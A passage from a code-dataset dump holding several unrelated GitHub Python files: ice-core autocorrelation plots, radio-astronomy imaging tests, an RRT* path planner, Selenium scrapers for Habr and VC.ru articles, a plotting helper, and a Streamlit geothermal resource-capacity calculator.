title='{} Core'.format(core_to_test.split()[0]))\nplt.show()\n\n## Plot all 5 cores together\nfig, (ax1, ax2, ax3, ax4, ax5) = plt.subplots(5, figsize=(10, 12), \n sharex=True, sharey=True, tight_layout=True)\nfor c, ax in zip(core_names, (ax1,ax2,ax3,ax4,ax5)):\n try:\n ts = anomaly_series[c][~np.isnan(anomaly_series[c])]\n tsaplots.plot_pacf(ts, ax=ax, lags=100, zero=False)\n ax.set(ylabel='Partial acorr.', title='{} Core'.format(c.split()[0]))\n except:\n continue\nax5.set(xlabel='Lag [yr]')\n\n## Plot 4 cores together - 500 years. Milcent not long enough\nfig, (ax6, ax7, ax8, ax9) = plt.subplots(4, figsize=(10, 12), \n sharex=True, sharey=True, tight_layout=True)\nfor c, ax in zip((name for name in core_names if 'Milcent' not in name), \n (ax6,ax7,ax8,ax9)):\n try:\n ts = anomaly_series[c][~np.isnan(anomaly_series[c])]\n tsaplots.plot_pacf(ts, ax=ax, lags=500, zero=False)\n ax.set(ylabel='Partial acorr.', title='{} Core'.format(c.split()[0]))\n except:\n continue\nax5.set(xlabel='Lag [yr]')\n\n## Plot with a different coloring when significant\nfig, ax = plt.subplots(figsize=(10,5))\ntsaplots.plot_pacf(test_series, ax=ax, lags=100, zero=False)\nax.set(xlabel='Lag [yr]', ylabel='Autocorr.', title='{} Core'.format(core_to_test.split()[0]))\nplt.show()\n","repo_name":"ehultee/stoch-SMB","sub_path":"processing-archive/icecore-ACF.py","file_name":"icecore-ACF.py","file_ext":"py","file_size_in_byte":2317,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"25753732462","text":"\"\"\"\nimaging tests: what gridders do what to the data?\n\"\"\"\nimport os\n#import runpy\n#runpy.run_path('continuum_imaging_general.py')\nimport pyregion\nimport numpy as np\nimport sys\nassert os.getenv('SCRIPT_DIR') is not None\nsys.path.append(os.getenv('SCRIPT_DIR'))\nfrom continuum_imaging_general import myclean, makefits\nfrom continuum_windows import Qmses\n\nfrom astropy.io import fits\nfrom astropy import wcs\n\nfrom taskinit import msmdtool, iatool, casalog, tbtool\n\nfrom tclean_cli import tclean_cli as tclean\nfrom flagdata_cli import flagdata_cli as flagdata\nfrom ft_cli import ft_cli as ft\nfrom gaincal_cli import gaincal_cli as gaincal\nfrom applycal_cli import applycal_cli as applycal\nfrom concat_cli import concat_cli as concat\nfrom importfits_cli import importfits_cli as importfits\nfrom imhead_cli import imhead_cli as imhead\nfrom makemask_cli import makemask_cli as makemask\nfrom exportfits_cli import exportfits_cli as exportfits\nfrom importfits_cli import importfits_cli as importfits\nfrom clearcal_cli import clearcal_cli as clearcal\nfrom split_cli import split_cli as split\nia = iatool()\nmsmd = msmdtool()\ntb = tbtool()\n\n\ndef myprint(x):\n print(x)\n casalog.post(str(x), origin='singlefield')\n\n\nmses = list(Qmses.keys())\n\n\nfullpath_mses = ['../' + ms[:-3] + \"_continuum_split_for_selfcal.ms\"\n for ms in mses if ms in Qmses]\n\ncont_vis = []\nfor ms in fullpath_mses:\n splitagain = ms[:-3] + \"_SgrB2_NM_Q.ms\"\n myprint(\"{0} -> {1}\".format(ms, splitagain))\n if not os.path.exists(splitagain):\n assert split(vis=ms, outputvis=splitagain,\n field='Sgr B2 NM Q',\n datacolumn='corrected')\n cont_vis.append(splitagain)\n\n\n\ncleanbox_mask_image = 'cleanbox_mask_SgrB2.image'\ncleanbox_mask = 'cleanbox_mask.mask'\nmask = cleanbox_mask_image\n\n\nselfcal_fields = \"Sgr B2 N Q,Sgr B2 NM Q,Sgr B2 MS Q\".split(\",\")\nselfcal_fields = ['Sgr B2 NM Q']\n\n\nextrapars = {'wproject': {'wprojplanes': 64,\n #'rotatepastep': 5.0,\n #'cfcache':'test_wtermmerge.cfcache',\n #'conjbeams':True,\n #'wbawp':True,\n },\n 'mosaic': {},\n 'standard': {},\n 'widefield': {},\n 'awproject': {'wprojplanes': 64,\n 'rotatepastep': 5.0,\n 'cfcache':'test_awtermmerge.cfcache',\n 'conjbeams':True,\n 'wbawp':True,\n },\n }\n\nfor gridder in ('standard', 'wproject', 'widefield', 'mosaic', 'awproject'):\n\n try:\n imagename = '18A-229_Q_singlefield_imaging_smallfield_test_{0}'.format(gridder)\n myclean(vis=cont_vis,\n fields=selfcal_fields,\n spws='',\n imsize=1000,\n phasecenters={\"Sgr B2 N Q\":'J2000 17h47m19.897 -28d22m17.340',\n \"Sgr B2 NM Q\":'J2000 17h47m20.166 -28d23m04.968',\n \"Sgr B2 MS Q\":'J2000 17h47m20.166 -28d23m04.968',\n \"Sgr B2 S Q\":'J2000 17h47m20.461 -28d23m45.059',\n },\n cell='0.01arcsec',\n name=imagename,\n gridder=gridder,\n niter=10000,\n threshold='0.5mJy',\n scales=[0,3,9],\n robust=0.5,\n savemodel='none',\n mask=mask,\n noneg=False,\n **extrapars[gridder]\n )\n except Exception as ex:\n myprint(ex)\n\nfor gridder in ('standard', 'wproject', 'widefield', 'mosaic', 'awproject'):\n\n imagename = '18A-229_Q_singlefield_imaging_largefield_test_{0}'.format(gridder)\n try:\n myclean(vis=cont_vis,\n fields=selfcal_fields,\n spws='',\n imsize=4000,\n cell='0.01arcsec',\n name=imagename,\n gridder=gridder,\n niter=10000,\n threshold='1mJy',\n scales=[0,3,9],\n robust=0.5,\n savemodel='none',\n mask=mask,\n noneg=False,\n **extrapars[gridder]\n )\n except Exception as ex:\n myprint(ex)\n","repo_name":"keflavich/SgrB2_VLA_18A-229","sub_path":"reduction/singlefield_imaging_tests.py","file_name":"singlefield_imaging_tests.py","file_ext":"py","file_size_in_byte":4334,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"33464630840","text":"import pygame\nimport random\nimport time\nfrom Node import *\nfrom Obstacle import obstacle\nfrom RRT import *\nfrom visulization import visualization\nimport time\n\ndef up():\n vis.update()\n\nif __name__ == \"__main__\":\n \n running = True\n\n #simulations setup\n scale = 7\n obstalce_list = [\n obstacle([(20,20),(20,40),(80,40),(80,20)]),\n obstacle([(20,20+30),(20,40+30),(80,40+30),(80,20+30)]),\n obstacle([(90,30),(90,80),(100,80),(100,30)])\n ]\n cardV = 1\n eta = 2\n acc = 10\n n = 2000\n root = Node(0,0)\n target = (115,95)\n size = (125,100)\n eta = 3\n printed = False\n #create the visualization \n vis = visualization(size,root,target_ = target, accuracy_ = acc, obstacles_ = obstalce_list, scale_ = 4)\n \n xNewNode = root\n \n gammaRRT = getGammaRRT(3,obstalce_list,size)\n pathsEnds =[]\n path = []\n minPathNode = Node(1,1)\n iterations = 0\n start_time = time.time()\n while running:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = False\n #main loop\n iterations +=1\n if(iterations <n):\n xRand = SampleFree(obstalce_list,size)\n xNearest = Nearest(root,xRand)\n xNew = steer(xNearest,xRand,eta)\n if obstacleFree(xNearest,xNew,obstalce_list):\n cMin = 0\n xNewNode = Node(xNew[0],xNew[1])\n ##need to add Card(V)\n #NearPoints = Near(root,xNew,min(eta,gammaRRT*((cardV/(2**cardV))**(1/2))))\n NearPoints = Near(root,xNew,eta)\n xMin = xNearest \n cMin = Cost(xNearest)+ CostOfEdge(xNearest,xNewNode)\n for xNear in NearPoints:\n if(collisionFree(xNear,xNew,obstalce_list)and Cost(xNear) + CostOfEdge(xNear,xNewNode)<cMin):\n xMin = xNear\n cMin = Cost(xNear) + CostOfEdge(xNear,xNewNode)\n xMin.addChild(xNewNode)\n cardV +=1\n for xNear in NearPoints:\n if collisionFree(xNear,(xNewNode.x,xNewNode.y),obstalce_list) and Cost(xNewNode)+ CostOfEdge(xNear,xNewNode)< Cost(xNear):\n\n xParent = xNear.parent\n xNewNode.addChild(xNear)\n xParent.connected.pop(xParent.connected.index(xNear))\n if distToPoint(xNewNode,target)< acc:\n pathsEnds.append(xNewNode)\n if(len(pathsEnds)>0):\n minNode = min(pathsEnds, key = lambda x:Cost(x))\n path = getPathToGoal(minNode)\n vis.path = path\n up()\n else:\n if not printed:\n printed = True\n print(\"time to Execute:\",n,time.time() - start_time)\n \n \n #vis.update()\n #pygame.display.flip()\n","repo_name":"AndrewCDownie/MTHE493","sub_path":"RRTStar.py","file_name":"RRTStar.py","file_ext":"py","file_size_in_byte":2916,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"17787617502","text":"# -*- coding: utf-8 -*-\n\"\"\"\nAll service parsers implemented in this module. Parser registration goes here too.\n\nWhen adding new Source all we have to do is to implement two new classes: SourceParser and SourceParserBuilder.\nFinally, we will need to register our newly created Parser within our Factory and we are done.\n\"\"\"\n\nimport requests\nimport logging\nimport os\nimport concurrent.futures\nimport itertools\nfrom bs4 import BeautifulSoup\nfrom time import sleep\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom fake_useragent import UserAgent\n\nfrom .factory import ObjectFactory\nfrom article.models import Article\n\nlogger = logging.getLogger('django')\n\napp_dir = os.path.dirname(os.path.abspath(__file__))\nuseragent = UserAgent()\nprofile = webdriver.FirefoxProfile()\n\n\nclass HabrParser:\n \"\"\"Parser for HabraHabr resource.\"\"\"\n\n def __init__(self, driver):\n self.driver = driver\n\n def test_connection(self):\n \"\"\"Test if authentication to source with user credentials went fine.\"\"\"\n\n auth_flag = False\n if self.driver.get_cookies():\n cookies = self.driver.get_cookies()\n for cookie in cookies:\n if cookie.get('name') == 'acc_sess_id':\n auth_flag = True\n break\n\n return auth_flag\n\n def do_parse(self, url):\n \"\"\"Start parsing process. Get pages to parse. Return generator with parsed articles\"\"\"\n\n sleep(1)\n feed_url = 'https://habr.com/ru/conversations/'\n # we have to visit some light-weight page before going to feed to prevent redirect\n self.driver.get(feed_url)\n\n sleep(1)\n feed_url = 'https://habr.com/ru/feed/'\n self.driver.get(feed_url)\n\n html = self.driver.page_source\n soup = BeautifulSoup(html, 'lxml')\n\n paginator = soup.find('ul', id='nav-pagess')\n pages_with_arts = ['https://habr.com/ru/feed/page1/'] # list of pages to be iterated through\n if paginator:\n lis = [li for li in paginator.find_all('li')]\n last_li_href = lis[-1].find('a')['href']\n last_page = int(last_li_href.split('/')[-2].split('page')[-1])\n\n for i in range(2, last_page + 1):\n pages_with_arts.append('https://habr.com/ru/feed/page{}/'.format(i))\n\n # TODO: implement multithreading. We need separate driver (?) for each thread to work properly within selenium\n # with concurrent.futures.ThreadPoolExecutor(max_workers=10) as executor:\n # articles = executor.map(self.parse_page, pages_with_arts)\n\n articles = list()\n pages_with_arts = pages_with_arts[:3] # for fast debug\n for page in pages_with_arts:\n articles.append(self.parse_page(page))\n\n self.driver.close()\n\n return list(itertools.chain(*articles))\n\n def parse_page(self, page):\n \"\"\"Receives page url to parse articles from. Returns list of articles.\"\"\"\n sleep(1)\n\n self.driver.get(page)\n page_html = self.driver.page_source\n soup = BeautifulSoup(page_html, 'lxml')\n articles = soup.find_all('article')\n\n page_articles = list()\n if articles:\n # attempt to speed up the process while main threading doesn't work in current selenium realization\n with concurrent.futures.ThreadPoolExecutor(max_workers=10) as executor:\n page_articles = executor.map(self.parse_article, articles)\n\n return page_articles\n\n def parse_article(self, article):\n parsed_article = dict()\n h2 = article.find('h2')\n h2_a = article.find('h2').find('a')\n href = h2_a['href'] if h2_a else ''\n\n if href:\n try:\n article = Article.objects.get(url=href)\n except Article.DoesNotExist:\n article = None\n\n if not article:\n try:\n detail = BeautifulSoup(requests.get(href).content, \"lxml\")\n body_post = detail.find('div', id='post-content-body')\n if body_post:\n full_text = detail.find('div', id='post-content-body').get_text().strip()\n parsed_article = {\n 'url': href,\n 'header': h2.get_text().strip(),\n 'text': full_text\n }\n sleep(0.5)\n else:\n logging.error(\"URL {} has no body.\".format(href))\n except Exception as ex:\n logger.error('Error \"{}\" while trying to open url: {}'.format(ex, href))\n else:\n # we have already stored this article in database and just need to connect it with user\n parsed_article = {\n 'db_article': article\n }\n\n return parsed_article\n\n\nclass HabrParserBuilder:\n def __init__(self):\n self._instance = None\n\n def __call__(self, login, password, **kwargs):\n driver = self.authorize(login, password)\n return HabrParser(driver)\n\n def authorize(self, login, password):\n \"\"\"\n Method authorize user within HabraHabr and return selenium driver object with all required cookies.\n\n Receives user login and password. Generates random fake user agent.\n Using selenium authorizes user, retrieves cookies.\n Returns selenium web driver object for next actions.\n\n :param login:\n :param password:\n :return: webdriver:driver\n \"\"\"\n\n profile.set_preference('general.useragent.override', useragent.random)\n\n driver = webdriver.Firefox(profile)\n\n url = \"https://account.habr.com/login/\"\n driver.get(url)\n driver.find_element_by_id('email_field').send_keys(login)\n sleep(.5)\n driver.find_element_by_id('password_field').send_keys(password)\n sleep(1)\n driver.find_element_by_name('go').click()\n\n return driver\n\n\nclass VcParser:\n \"\"\"Parse for VC.RU resource.\"\"\"\n\n def __init__(self, driver):\n self.driver = driver\n\n def test_connection(self):\n \"\"\"Test if authentication to source with user credentials went fine.\"\"\"\n\n auth_flag = False\n if self.driver.get_cookies():\n cookies = self.driver.get_cookies()\n for cookie in cookies:\n if cookie.get('name') == 'osnova-aid':\n auth_flag = True\n break\n\n return auth_flag\n\n def do_parse(self, url):\n \"\"\"Starts parsing process\"\"\"\n sleep(1)\n\n height = self.driver.execute_script(\"return document.body.scrollHeight\")\n # Simulation of scrolling down process, until all articles will be shown\n while True:\n body = self.driver.find_element_by_tag_name('body')\n body.send_keys(Keys.END)\n\n sleep(3) # wait till new articles will be loaded via AJAX\n\n current_height = self.driver.execute_script(\"return document.body.scrollHeight\")\n if current_height != height:\n height = current_height\n else:\n # no more articles to load\n break\n\n page_html = self.driver.page_source\n soup = BeautifulSoup(page_html, 'lxml')\n articles = soup.find_all('div', {'class': 'feed__item l-island-round'})\n\n with concurrent.futures.ThreadPoolExecutor(max_workers=10) as executor:\n page_articles = executor.map(self.parse_article, articles)\n\n self.driver.close()\n\n return page_articles\n\n def parse_article(self, article):\n \"\"\"Receives article preview. Return dict with fill article info, or with existed article in db.\"\"\"\n\n parsed_article = dict()\n\n author = article.find('div', {'class': 'content-header-author__name'})\n if author and author.get_text().strip() != \"Промо\": # we don't want promo blocks to get parsed\n h2 = article.find('h2')\n full_link = article.find('a', {'class': 'content-feed__link'})\n href = full_link['href'] if full_link else ''\n\n if href:\n try:\n article = Article.objects.get(url=href)\n except Article.DoesNotExist:\n article = None\n\n if not article:\n try:\n detail = BeautifulSoup(requests.get(href).content, \"lxml\")\n body_post = detail.find('div', {'class': 'content content--full'})\n if body_post:\n # remove some web page stuff\n try:\n body_post.find('div', {'class': 'l-island-a l-mv-20 content-counters'}).decompose()\n body_post.find('div', {'class': 'authorCard l-mt-30'}).decompose()\n except Exception as ex:\n logger.error('Error \"{}\" while trying to remove unused elements from page: {}'.format(ex, href))\n full_text = body_post.get_text().strip()\n parsed_article = {\n 'url': href,\n 'header': h2.get_text().strip(),\n 'text': full_text\n }\n sleep(0.5)\n else:\n logging.error(\"URL {} has no body.\".format(href))\n except Exception as ex:\n logger.error('Error \"{}\" while trying to open url: {}'.format(ex, href))\n else:\n # we have already stored this article in database and just need to connect it with user\n parsed_article = {\n 'db_article': article\n }\n\n return parsed_article\n\n\nclass VcParserBuilder:\n def __init__(self):\n self._instance = None\n\n def __call__(self, login, password, **kwargs):\n driver = self.authorize(login, password)\n return VcParser(driver)\n\n def authorize(self, login, password):\n \"\"\"\n Method authorize user within VC and return selenium driver object with all required cookies.\n\n Receives user login and password. Generates random fake user agent.\n Using selenium authorizes user, retrieves cookies.\n Returns selenium web driver object for next actions.\n\n :param login:\n :param password:\n :return: webdriver:driver\n \"\"\"\n\n profile.set_preference('general.useragent.override', useragent.random)\n\n driver = webdriver.Firefox(profile)\n\n try:\n url = \"https://vc.ru/\"\n driver.get(url)\n driver.find_element_by_class_name('site-header-user-login__label').click()\n auth_buttons = driver.find_elements_by_class_name('social-auth__button')\n for button in auth_buttons:\n if button.get_attribute('air-click') == 'auth_goto_tab':\n button.click()\n break\n driver.find_element_by_name('login').send_keys(login)\n sleep(.5)\n driver.find_element_by_name('password').send_keys(password)\n sleep(1)\n driver.find_element_by_name('password').send_keys(Keys.ENTER)\n except Exception as ex:\n logger.error('Error during auth process VC.RU: {}'.format(ex))\n\n return driver\n\n\nfactory = ObjectFactory()\nfactory.register_builder('HABR', HabrParserBuilder())\nfactory.register_builder('VC', VcParserBuilder())\n","repo_name":"UNREALre/TopArticles","sub_path":"top_parser/parsers.py","file_name":"parsers.py","file_ext":"py","file_size_in_byte":11715,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"33182401580","text":"import pandas as pd\nimport matplotlib\n\ndef plot_bar_by_feature(dataset, feature, size_delta=(0,0)):\n features = dataset.columns.tolist()\n if feature not in features:\n return\n data = {feature:[], 'counts':[]}\n for a in dataset[feature].unique():\n data[feature].append(a)\n data['counts'].append(dataset[dataset[feature] == a].shape[0])\n DFData = pd.DataFrame(data)\n DFData = DFData.sort_values(by=['counts'], ascending=False)\n a = DFData.plot.bar(x=feature, y='counts')\n W,H = a.figure.get_size_inches()\n a.figure.set_size_inches(W+size_delta[0],H+size_delta[1])\n a.figure.show()\n # a.figure.savefig('../images/'+feature)","repo_name":"SongShawn/MachineLearning","sub_path":"capstone/solutions/visual.py","file_name":"visual.py","file_ext":"py","file_size_in_byte":673,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"39305027194","text":"# -*- coding: utf-8 -*-\n\"\"\"\nApp created on Thu May 13 09:31:30 2021\nThen expanded on with love. \n\nThis app remains a work in progress :-) \n\nKey changes needed include:\n- Chat to Jan about the addion of mean and sd of input paramaters. \n Perhaps it would be better to include an option to download the paramaters as passed in\n plus a calculated P50. It would also be useful to include the P10-P50-P90 MWe result in this. \n\n- Copy edit and trim the text. \n\n- Remake the power density plot into something that better reflects the underlying data.\n\n- Set up to call the calculate_cumulative_conf from a helper function file \n rather than repeat here and elsewhere in the repo. \n\nThere are a number of working refinements and thoughts throughout this file tagged with \"NOTE\"\n\n\"\"\"\n\n# Import libraries for viz\nimport streamlit as st\nimport plotly.express as px\nimport pandas as pd\nimport base64\nfrom pathlib import Path\n\n# Import libraries for computation\nimport numpy as np\nimport scipy\nfrom scipy.stats import norm, lognorm\nimport matplotlib.pyplot as plt\n\n# ================\n# Helper functions\n# ================\n\n# NOTE We should look at calling the calculate_cumulative_conf function from a centralized function file\n\ndef download_link(object_to_download, download_filename, download_link_text):\n \"\"\"Generates a link from which the user can download object_to_download \n \n Method from https://discuss.streamlit.io/t/heres-a-download-function-that-works-for-dataframes-and-txt/4052\n\n Args: object_to_download (str, pd.DataFrame): The object to be downloaded\n download_filename (str): Filename and extension of file (e.g. mydata.csv or some_txt_output.txt)\n download_link_text (str): Text to display for download link\n\n Example: download_link(YOUR_DF, 'YOUR_DF.csv', 'CSV built! Click here to download your data!')\n \"\"\"\n if isinstance(object_to_download,pd.DataFrame):\n object_to_download = object_to_download.to_csv(index=True)\n\n # some strings <-> bytes conversions necessary here\n b64 = base64.b64encode(object_to_download.encode()).decode()\n\n return f'<a href=\"data:file/txt;base64,{b64}\" download=\"{download_filename}\">{download_link_text}</a>'\n\n\ndef calculate_cumulative_conf(areaP90: float=1., areaP10: float=10., pdP90: float=10., pdP10: float=24):\n \"\"\"Calculate cumulative confidence level for expected development size in MW\n\n Args:\n areaP90 (float): pessimistic area in sqkm\n areaP10 (float): optimistic area in sqkm\n pdP90 (float): pessimistic power density in MWe/sqkm\n pdP10 (float): optimistic power density in MWe/sqkm\n\n Returns:\n prob_df (pandas Dataframe): cumulative confidence curve in Reservoir Size\n \"\"\"\n # calculate area > 250 °C\n area_mu = ((np.log(areaP90)+np.log(areaP10))/2)\n area_sigma = (np.log(areaP10)-np.log(areaP90))/((norm.ppf(0.9)-(norm.ppf(0.1))))\n\n # calculate powerdensity mean and standard dev\n powerdens_mu = ((np.log(pdP90)+np.log(pdP10))/2)\n powerdens_sigma = (np.log(pdP10)-np.log(pdP90))/((norm.ppf(0.9)-(norm.ppf(0.1))))\n\n\n capacity_mu = area_mu + powerdens_mu\n capacity_sigma = ((area_sigma**2)+(powerdens_sigma**2))**0.5\n eds = [lognorm.ppf(x/100, capacity_sigma, loc=0, scale=np.exp(capacity_mu)) for x in range(0,100)]\n indx = list(np.arange(0,100)[::-1])\n edsepc_tups = list(zip(indx,eds))\n prob_df = pd.DataFrame(edsepc_tups, columns = ['Cumulative confidence (%)', 'Expected development size (MWe)'])\n\n return prob_df\n\n\n# =============\n# Streamlit app\n# =============\n\n# ----------------------\n# Headder and intro text\n# ----------------------\n\nst.title('Conventional Geothermal Resource Exploration Tool')\n\nst.write('This tool does the calculations required for estimating the:')\n\nst.write('1. Probability of exploration success') \nst.write('2. Resource capacity using a probabilistic, lognormal power density method')\n\nst.markdown(\"___\")\n\n# -----------------------------------\n# Estimate the probability of success \n# -----------------------------------\n\nst.write('# 1. Probability of Exploration Success')\n\nst.write('This is a transparent method for estimating the probability of exploration success, ' + \n 'where exploration success is defined as discovering a commercially viable resource.')\n\n# NOTE need to find better way of formatting lists\n\nst.write('Estimate the percent confidence that the prospect has the following ' + \n 'based on the available resource data and the conceptual model:') \n\nst.write('1. Sufficient temperature for the desired power conversion technology or direct use application')\nst.write('2. Enough permeability to support economic well flows (self-flowing or pumped wells)')\nst.write('3. Benign or manageable fluid chemistry') \n\nst.write(' ') # NOTE need to look into better method for spacing layout \n\n#\n# Make sliders\n#\n\ncol1, col2, col3 = st.columns(3) # Show sliders in 3 columns\n\nPtemp = col1.slider('Temperature', value=65, min_value=1, max_value=100,step=1, format='%i%%', key='Ptemp')\nPperm = col2.slider('Permeability', value=65, min_value=1, max_value=100,step=1, format='%i%%', key='Pperm')\nPchem = col3.slider('Chemistry', value=95, min_value=1, max_value=100,step=1, format='%i%%', key='Pchem')\n\n\n#\n# Calculate POS in decimal percent\n#\n\nPtemp /= 100 \nPperm /= 100\nPchem /= 100\n\nPOSexpl = Ptemp * Pperm * Pchem\n\n\n#\n# Output POS result to app in percent rounded to nearest whole number\n#\n\nst.write(f'_{round(Ptemp*100)}% temperature \\* {round(Pperm*100)}% permeability ' +\n f'* {round(Pchem*100)}% chemistry = {round(POSexpl*100)}% probability of exploration success_')\n\n\n#\n# App formatting\n#\n\nst.markdown(\"___\")\n\n\n# -----------------------\n# Estimate power capacity\n# -----------------------\n\n\n#\n# Intro text\n#\n\nst.write(\"# 2. Power Capacity\")\n\nst.write('Power density is one of several methods used to evaluate the ' + \n 'power capacity of conventional geothermal resources. ' + \n 'The power density method implemented here uses a probabilistic framework where ' + \n 'pessimistic (P90) and optimistic (P10) estimates of area and power density ' +\n 'are input and a probability distribution of power capacity is returned. ' +\n 'The entire method involves three steps, and this tool does the calculations required for the third step.')\n\nst.write('**Step 1:** Integrates available resource data into a set of conceptual models ' +\n 'that reflect the smallest (pessimistic, P90) and largest (optimistic, P10) resource ' +\n 'that could be present. The P50 model is typically also discussed at this stage, but is not an input parameter for Step 3. ' + \n 'Refer to [Cumming 2009](https://pangea.stanford.edu/ERE/pdf/IGAstandard/SGW/2009/cumming.pdf) ' +\n 'for how to construct conceptual models from surface exploration data. Refer to ' +\n '[Wallis et al 2017](https://www.geothermal-energy.org/pdf/IGAstandard/NZGW/2017/111_Wallis-Final_.pdf) ' + \n 'for approaches to reservoir volume uncertainty and a tool that assists with developing the P10/P90 end-member models.')\n\nst.write('**Step 2:** Project the potentially productive resource volume in the P10 and P90 conceptual models ' + \n 'to a plan-view map and calculate the area. The potentially productive resource is the extent of ' + \n 'the reservoir with sufficient temperature to support the desired power conversion technology or direct use application. ' +\n 'This means that resource areas below the temperature limit of preferred power conversion technology are excluded. '\n 'Refer to [Cumming 2016a](https://publications.mygeoenergynow.org/grc/1032377.pdf) (Figure 9) for ' + \n 'how to project the conceptual models to surface and calculate the area.' )\n\nst.write('**Step 3:** Calculate the power capacity by ' +\n 'multiplying the P10 and P90 area of the potentially productive resource (km2) with a range of ' + \n 'power density (MWe/km2), where the latter by comparison to analogous developed resources. ' +\n 'Sections 2.1 and 2.2 below are designed to assist resource scientists with this step. '\n 'The lognormal approach to power density used in this web-app is described in ' +\n '[Cumming 2016b](https://pangea.stanford.edu/ERE/pdf/IGAstandard/SGW/2016/Cumming.pdf).')\n\n# --------------------------------\n# Select Appropriate Power Density\n# --------------------------------\n\nst.write('# 2.1 Estimate Power Density')\n\nst.write('Power density is defined as the sustainable generation (in megawatts) per square kilometer of productive resource area. '+\n 'Below we step through how a reasonable range of power capacity can be identified for an exploration prospect. ')\n\nst.write('Because there is a strong relationship between temperature and power capacity, temperature guides selection of the ' +\n 'power density values that are used to calculate capacity. However, temperature is not used in the calculation. The values input below are included for reporting purposes. ')\n\ncolA, colB = st.columns(2)\n\n# NOTE should probably should add a message/try catch that says these fields must be numeric\nTmax = float(colA.text_input(\"Average temperature (degC) in the P90 area\", 280))\nTmin = float(colB.text_input(\"Minimum temperature for the P10 area (degC)\", 250))\n\nst.write('Use these temperatures and the geologic setting of your prospect to ' + \n 'identify developed geothermal systems that have similar characteristics. ' +\n 'We use geologic setting to identify analogues because geology influences permeability, ' + \n 'which is another resource characteristic that greatly influences power capacity. ' )\n\nst.write('Evaluation of the production area and power capacity of well-selected developed analogues ' + \n 'provides the most reliable range of power density. ' + \n 'For open access information on developed resources, refer to conference paper databases ' +\n 'maintained by the [International Geothermal Association](https://www.geothermal-energy.org/explore/our-databases/conference-paper-database/) ' + \n 'and [Geothermal Rising](https://www.geothermal-library.org/). ' + \n 'NREL maintains [geothermal wiki](https://openei.org/wiki/Geothermal_Areas) that is a growing repository of case study information.')\n\nst.write('If no analogues can be identified, then take the minimum temperature of the P10 area ' +\n 'and find a power density range using the plot below. ' + \n 'For example, a minimum P10 temperature of 250degC would yeld a range as wide as 2 - 23 MW/km2. ' +\n 'This wide range is appropriate and reflects the large uncertainty present in the power density estimate when there are no developed analogues.')\n\npd_database = pd.read_csv(r'https://raw.githubusercontent.com/Geothermal-Resource-Capacity/Power-Density/main/data/PowerDensityDatabase_Expanded.csv')\nfig = px.scatter(\n pd_database, \n x='Average temperature [degC]', \n y='Power density [MWe/km2]', \n color='System type',\n hover_data=['Field', 'System type', 'Average temperature [degC]', 'Enthalpy classification', 'Power density [MWe/km2]'],\n)\n\nst.plotly_chart(fig)\n\nst.write('The plotted power density and average temperature are from Wilmarth et al. (2019), which expands on earlier work published ' + \n '[here](https://www.geothermal-energy.org/pdf/IGAstandard/WGC/2015/16020.pdf). ' +\n 'The power density was calculated by dividing the sustained production in MWe by the area within a merged 500 m buffer ' + \n 'placed around production wells. It follows that these power densities may not directly equate to the area of potentially productive resource ' + \n 'and the areas defined using the concept model process. However, these power density values were created using a systematic approach and are a reasonable approximation. ' +\n 'The information on system type and enthalpy classification ' +\n 'are from literature review conducted by Irene Wallis. The data in this plot has been ' + \n 'made open access in [this repository](https://github.com/Geothermal-Resource-Capacity/Power-Density) under an Apache 2 license.') \n\n# ---------------------------\n# Power capacity - user input\n# ---------------------------\n\nst.write('# 2.2 Calculate Power Capacity')\nst.write('Input your P90 (pessimistic) and P10 (optimistic) estimates for ' + \n 'area from your conceptual model and power density based on developed analogues.') \n\ncolA, colB = st.columns(2)\n\ncolA.header(\"Input Area\")\ncolB.header(\"Input Power Density\")\n\nArea_P90 = float(colA.text_input(\"P90 (pessimistic) production area (km2)\", 1))\nPowerDens_P90 = float(colB.text_input(\"P90 (pessimistic) power density (MWe/km2)\", 10))\n\nArea_P10 = float(colA.text_input(\"P10 (optimistic) production area (km2)\", 10))\nPowerDens_P10 = float(colB.text_input(\"P10 (optimistic) power density (MWe/km2)\", 24))\n\n# ----------------------------------------------\n# Power capacity - calculations (under the hood)\n# ----------------------------------------------\n\n# Calculate nu and sigma for resource area \n# (the mean and variance in log units required for specifying lognormal distributions)\narea_nu = ((np.log(Area_P90)+np.log(Area_P10))/2)\narea_sigma = (np.log(Area_P10)-np.log(Area_P90))/((norm.ppf(1-0.1)-(norm.ppf(0.1))))\n\n# Calculate nu and sigma for the power density\npowerdens_nu = ((np.log(PowerDens_P90)+np.log(PowerDens_P10))/2)\npowerdens_sigma = (np.log(PowerDens_P10)-np.log(PowerDens_P90))/((norm.ppf(1-0.1)-(norm.ppf(0.1))))\n\n# Calculate nu and sigma for MWe Capacity\ncapacity_nu = area_nu + powerdens_nu\ncapacity_sigma = ((area_sigma**2)+(powerdens_sigma**2))**0.5\n\nindices = ['area [sqkm]', 'power_density [MWe/sqkm]', 'capacity [MWe]']\np_values = {'P90': [Area_P90, PowerDens_P90, 'P90_capacity'],\n 'P50': [round(np.exp(area_nu)), round(np.exp(powerdens_nu)), round(np.exp(capacity_nu))],\n 'P10': [Area_P10, PowerDens_P10, 'P10_capacity']}\n\n# NOTE double check these outputs against the cumulative confidence curve\n# Why does np.exp(capacity_nu) = 49% in the cumulative confidence curve data rather than 50%?\n# Would be good also to include the P90 and P10 capacity into the output table\n\nparam_df = pd.DataFrame.from_dict(p_values, orient='index', columns=indices)\n\n# Calculate cumulative confidence curve\nprob_df = calculate_cumulative_conf(Area_P90, Area_P10, PowerDens_P90, PowerDens_P10)\n\n\n# ------------------------------------------\n# Power capacity - simple web output to user \n# ------------------------------------------\n\n#\n# Table summarising input and output \n#\n\ncol1, col2, col3, col4 = st.columns([2,1,1,1])\n\n# Table headder\ncol1.header(\"Output\")\ncol2.header(\"P90\")\ncol3.header(\"P50\")\ncol4.header(\"P10\")\n\n# Row 1 - Range of areas\ncol1.write('Area (km2)')\ncol2.write(Area_P90)\ncol3.write(round(np.exp(area_nu),1))\ncol4.write(Area_P10)\n\n# Row 2 - Range of power 